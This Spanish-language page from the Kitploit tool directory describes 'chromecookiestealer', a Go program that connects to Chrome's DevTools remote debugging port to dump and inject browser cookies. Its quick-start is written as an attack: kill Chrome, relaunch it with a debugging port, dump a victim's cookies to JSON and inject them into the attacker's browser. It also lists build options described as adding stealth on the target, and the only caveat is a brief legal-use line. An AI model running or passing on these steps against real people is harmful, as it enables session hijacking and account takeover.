Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
chromecookiestealer — Robar/Inyectar cookies de Chrome a través del protocolo DevTools (--remote-debugging-port). | Kitploit
Herramientas/GitHubGitHub/magisterquis/chromecookiestealer
Exfiltración de DatosRecopilación de InformaciónSeguridad WebPruebas de Penetración
GitHubmagisterquis/chromecookiestealer

chromecookiestealer

Robar/Inyectar cookies de Chrome a través del protocolo DevTools (--remote-debugging-port).

Ver Repositorio
1151413hace 3 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Chrome Cookie Stealer (y inyector)

Se adjunta a Chrome utilizando su protocolo Remote DevTools y roba/inyecta/limpia/elimina cookies.

Muy inspirado por WhiteChocolateMacademiaNut.

Las cookies se vuelcan como objetos JSON usando el propio formato de Chrome. El mismo formato se usa para las cookies a cargar.

Solo para uso legal.

Características

  • Volcar las cookies de Chrome
  • Inyectar cookies volcadas en (otra instancia de) Chrome
  • Limpiar las cookies de Chrome
  • Valores predeterminados configurables en tiempo de compilación

Inicio rápido

Robar las cookies de una víctima:

git clone https://github.com/magisterquis/chromecookiestealer.git
cd chromecookiestealer
go build
pkill Chrome
/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --remote-debugging-port=9222 --restore-last-session # Varies by target
./chromecookiestealer -dump ./cookies.json

Inyectar en el navegador local del atacante:

# Inicia Chrome con un puerto de depuración, como arriba.
./chromecookiestealer -clear -inject ./cookies.json

Uso

Usage: chromecookiestealer [options]
Attaches to Chrome using the Remote DevTools Protocol (--remote-debugging-port)
and, in order and as requested:

- Dumps cookies
- Clears cookies
- Injects cookies
- Deletes selected cookies

Parameters for cookies to be deleted should be represented as an array of JSON
objects with the following string fields:

name   - Name of the cookies to remove.
url    - If specified, deletes all the cookies with the given name where domain
         and path match provided URL.
domain - If specified, deletes only cookies with the exact domain.
path   - If specified, deletes only cookies with the exact path.

Filenames may also be "-" for stdin/stdout.

Options:
  -chrome URL
    	Chrome remote debugging URL (default "ws://127.0.0.1:9222")
  -clear
    	Clear browser cookies
  -delete file
    	Name of file containing parameters for cookies to delete
  -dump file
    	Name of file to which to dump stolen cookies
  -inject file
    	Name of file containing cookies to inject
  -no-summary
    	Don't print a summary on exit
  -verbose
    	Enable verbose logging

Compilación

go build debería ser suficiente. Lo siguiente se puede establecer en tiempo de compilación con -ldflags '-X main.Foo=bar' para un poco más de sigilo en el objetivo.

VariableDescripción
DumpFileNombre de un archivo al que volcar cookies. Implica -dump
InjectFileNombre de un archivo desde el cual inyectar cookies. Implica -inject
DeleteFileNombre de un archivo con parámetros que describen cookies a eliminar. Implica -delete
DoClearSi se establece a cualquier valor, implica -clear

Ninguno de los anteriores está establecido por defecto.

El Protocolo Chrome DevTools es un objetivo en movimiento. Puede ser necesario usar una versión más reciente de las librerías chromedp y cdproto en caso de que este programa deje de funcionar. Esto se puede hacer con

go get -u -v all
go mod tidy
go build

lo que podría tener el efecto secundario de romper todo lo demás.

¯\_(ツ)_/¯

Descargar herramienta